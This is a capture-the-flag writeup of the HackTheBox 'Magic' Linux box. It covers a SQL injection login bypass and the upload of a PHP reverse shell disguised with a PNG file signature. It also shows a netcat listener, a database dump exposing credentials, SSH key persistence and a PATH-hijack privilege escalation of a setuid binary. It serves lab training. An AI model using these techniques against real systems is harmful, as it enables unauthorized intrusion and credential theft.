Hello again ! Today I'm doing the writeup of Magic, a medium Linux box released on April 18th 2020 on HackTheBox.
If you have VIP access on the website, you can access it here : https://www.hackthebox.eu/home/machines/profile/241
As usual, I'm using nmap to scan for an entry point
nmap -A -p- -T4 10.10.10.176
I am using basic options as usual :
- -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
- -p- : nmap scans every port
- -T4 : allows you to adjust the Timing Template (according to your bandwidth, and the speed you're seeking)
I got the following results :
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-21 10:27 CEST Nmap scan report for 10.10.10.185 Host is up (0.14s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA) | 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA) |_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Magic Portfolio No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=4/21%OT=22%CT=1%CU=33683%PV=Y%DS=2%DC=T%G=Y%TM=5E9EAF3 OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS( OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11 OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN( OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R= OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F= OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD= OS:S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 349.03 ms 10.10.14.1 2 349.02 ms 10.10.10.185 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 213.48 seconds
We notice an Http server running on port 80 with http-title being Magic Portfolio. Not the first portfolio we had on a HackTheBox machine, and I'm already thinking about malicious file upload.
Let's navigate to the website and take a look
To perform a malicious file upload, and maybe get a reverse-shell, I obviously need a way to upload my file. The inscription in the bottom left corner says :
Login I get a connection form, on which I try some basic SQL injections. The first that worked was
' or ''=', but you're welcome to find others 🙂
We are then asked to upload a file. How nice, thank you !
I am going to use a well known PHP reverse shell, but you can choose another one, or even build your own (it's actually not that hard if you're wondering). Link is: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
A filter is preventing us from uploading a php file. I tried the basic method of putting .png at the end of the file's name, but it wasn't enough to fool the filter. It seems to be checking the file's header. So what we need to do, is change this header to match the PNG signature.
To do this I retrieved the PNG signature (you can get a list of signatures here https://en.wikipedia.org/wiki/List_of_file_signatures). I then used a tool called bless, that is basically a hexadecimal editor, to remove the first 8 bytes and replace them with
89 50 4E 47 0D 0A 1A 0A.
Our file is ready for upload. If everything went the way it should have, you should get the following message :
The final step of getting access is running our malicious code on the remote server. ( I love this sentence, makes very HackerFilmLike don't you think ? 🙂 )
I used dirbuster to locate the folder where uploaded "images" are stored. I ran
sudo nc -lvp 443
port 443 being the one I entered in my PHP file (do remember to create a TCP redirection to your computer on this port).
And we got a shell !
After some enumeration, I found a db.php5 file, that clearly refers to Database.
It mentions credentials, and a database name. Let's try to see if there is a dump of that database :
mysqldump Magic -u theseus --password=iamkingtheseus -X
This gives us a XML formated version of the sql script used to load the database at the state it was when is was dumped.
1 admin Th3s3usW4sK1ng
Here is our password
Now that we have credentials, we can use the
su command to login as theseus. This only works if we have a terminal. To get one, use the following command :
/usr/bin/script -qc /bin/bash /dev/null
su theseus with
We got user !
To work on a proper terminal, I can first add my SSH key to the
~/.ssh/authorized_keys file, to allow us to ssh into the machine with theseus's profile.
On my machine, I generate a set of ssh keys :
Next step is to copy the content of my
~/.ssh/id_rsa.pub into the authorized_keys of the remote machine.
[email protected]:~/.ssh$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDJnXvUI5MJjKZ6C+nMi06aaZh8JHkwW9nFmkfH8sVEizTHryfhtFLfWK7Djp/5WBQ7cH2WmGR3xBswr++CbKw5XYi0OefhuJIViVa5CiElJehjRsOLLKBN9wOqnDh5WmgQWoq3HjpxIvrd41qxoAm38xb6aJPd1rc7yRNeZXH9G8Qmpo1npQ0XYdwgWLe/Ah+wb3NoQt4Zfmj1jdA42EyXgj69vYmeyQII3dWvj3kbTzcBc6VJvKu9R3F91dfNrZeJDzizolj5olfKvKEwHB2Z1N/b0YsnPp5s7onmnTkZvvPxUEWlHMqqtc8kUt25bvg+hsHrFpSZK/13SlPqe+xzmqfdMT3eeP6wXejl+QPXuSD236DrTPBA60FRSBnaMtJuOxI+bmoHJL2TKSnsmryZvfuOcVsEGRtsewMxKjPzF2oGUlQw938DHe/FRsl1IzgysdKdFzhlHlYkgAC7zZrNfjbDMU+RDgMS+Lrxd7ltlkhZ7uyfXnSVfbFwUgUrsGgWJv4yIDJRnd5+mRfBpP4xn5zEe8y387KSbc1r+AMY3RgVowXYR09BTtd3Wby5vxyzHX4zc0F5M0wbSVmbCZidxIDWZaFIsDX8GHCcgXL8Cqf8NWD32dyhbszLG9X+QPQKNreoos7TJnG75Z8qIhq2JjXHAkviV9gamnvwu7ax5Q== [email protected] >> authorized_keys
Make sure to use
>> instead of
> to avoid destroying other's work in progress (it adds the key to the file, without wiping its content).
Done, we now have proper access to the machine as theseus
ssh -i id_rsa [email protected]
/usr/bin/script -qc /bin/bash /dev/null again to get coloration on the terminal. Not essential, but it sure is easier when using enumeration scripts for example.
Speaking of which, let's upload linPeas.sh and run it
┌─|Log_s [18:17] :~ └──╼ $ scp linPeas.sh [email protected]:/tmp linPeas.sh 100% 157KB 140.9KB/s 00:01
[email protected]:/tmp$ chmod +x linPeas.sh [email protected]:/tmp$ ./linPeas.sh > scan.txt
I noticed a file with setuid, that's not usually there in
Indeed sysinfo isn't a usual file. When running it, I discover lots of information about the system. After digging further and some enumeration by hand, I made the connection between our sysinfo and
/usr/bin/lshw. When being ran, this file displays a part of the sysinfo's.
A warning also pop's up
WARNING: you should run this program as super-user.
So sysinfo is probably calling this program with its super-user rights. If we could write our own lshw, we could do anything with root privileges on the system.
Let's right this file. We can do a simple
echo 'echo flag :;cat /root/root.txt'>lshw.
Now let's save this file as /tmp/lshw, and give it the proper rights.
[email protected]:/tmp$ echo 'echo flag :;cat /root/root.txt' > lshw echo 'echo flag :;cat /root/root.txt' > lshw [email protected]:/tmp$ chmod 777 lshw
The last step before running the exploit, is to make sure
/bin/sysinfo finds our script before it finds the real one. In order to do so, the PATH needs to reference
This changes the PATH for the current session. We define the PATH's value to /tmp and add the original PATH's value with $PATH. This is essential in order for a large set of commands to still work. Remember that every entry in the PATH is separated by ":" . You can check it out yourself by running
Run the exploit :
And we got the flag !